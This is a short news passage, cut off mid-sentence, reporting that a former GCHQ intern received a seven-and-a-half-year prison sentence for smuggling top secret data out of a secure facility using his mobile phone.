A former intern at the UK’s intelligence agency GCHQ has been sentenced to seven and a half years in prison after admitting to smuggling top secret data out of a secure facility using his mobile phone, in a breach described…